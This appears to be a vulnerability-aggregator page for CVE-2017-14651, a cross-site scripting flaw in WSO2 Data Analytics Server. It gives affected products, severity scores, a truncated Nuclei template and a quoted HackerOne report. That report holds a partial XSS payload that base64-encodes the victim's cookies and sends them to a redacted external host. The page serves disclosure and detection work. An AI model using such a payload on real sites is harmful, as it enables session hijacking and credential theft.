CVE-2017-14651
published 2017-09-21CVE-2017-14651: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
PriorityP428medium4.8CVSS 3.1
AVNACLPRHUIRSCCLILAN
EXPLOIT
EPSS
3.84%
88.8th percentile
WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wso2 | api_manager | — | — |
| wso2 | app_manager | — | — |
| wso2 | application_server | — | — |
| wso2 | business_process_server | — | — |
| wso2 | business_rules_server | — | — |
| wso2 | complex_event_processor | — | — |
| wso2 | dashboard_server | — | — |
| wso2 | data_analytics_server | — | — |
| wso2 | data_services_server | — | — |
| wso2 | enterprise_integrator | — | — |
| wso2 | enterprise_mobility_manager | — | — |
| wso2 | governance_registry | — | — |
| wso2 | identity_server | — | — |
| wso2 | iot_server | — | — |
| wso2 | machine_learner | — | — |
| wso2 | message_broker | — | — |
| wso2 | storage_server | — | — |
CVSS provenance
nvdv3.14.8MEDIUMCVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
nvdv2.03.5LOWAV:N/AC:M/Au:S/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
nuclei·CVSS 4.8
CVE-2017-14651 [MEDIUM] WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
Template:
id: CVE-2017-14651
info:
name: WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting
author: mass0ma
severity: medium
description: WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a patched vers
HackerOne
Reflected XSS at www.███████ at /██████████ via the ████████ parameter
hackerone·2021-06-03·CVSS 4.8
CVE-2017-14651 [MEDIUM] Reflected XSS at www.███████ at /██████████ via the ████████ parameter
Reflected XSS at www.███████ at /██████████ via the ████████ parameter
**Description:**
The www.████████ site is using `████`, which is vulnerable to reflected XSS in the `/█████` component via the `█████████` parameter.
## References
https://www.cvedetails.com/cve/CVE-2017-14651/
https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265
## Impact
An attacker can cause malicious code to execute in the victims browser, leading to credential theft, drive-by downloads, malicious redirects, and more.
## System Host(s)
www.██████████
## Affected Product(s) and Version(s)
████████
## CVE Numbers
CVE-2017-14651
## Steps to Reproduce
Browse to https://www.███████/███████?██████████=%3Cimg%20src=x%20onerror="a='http%3a%2f%2f███';b='%3Fcookie=';c=btoa(document.cookie);window.op
Greynoiseio
NoiseLetter March 2025
blogs_greynoiseio
NoiseLetter March 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.htmlhttps://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265https://github.com/cybersecurityworks/Disclosed/issues/15https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.htmlhttps://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265https://github.com/cybersecurityworks/Disclosed/issues/15
2017-09-21
Published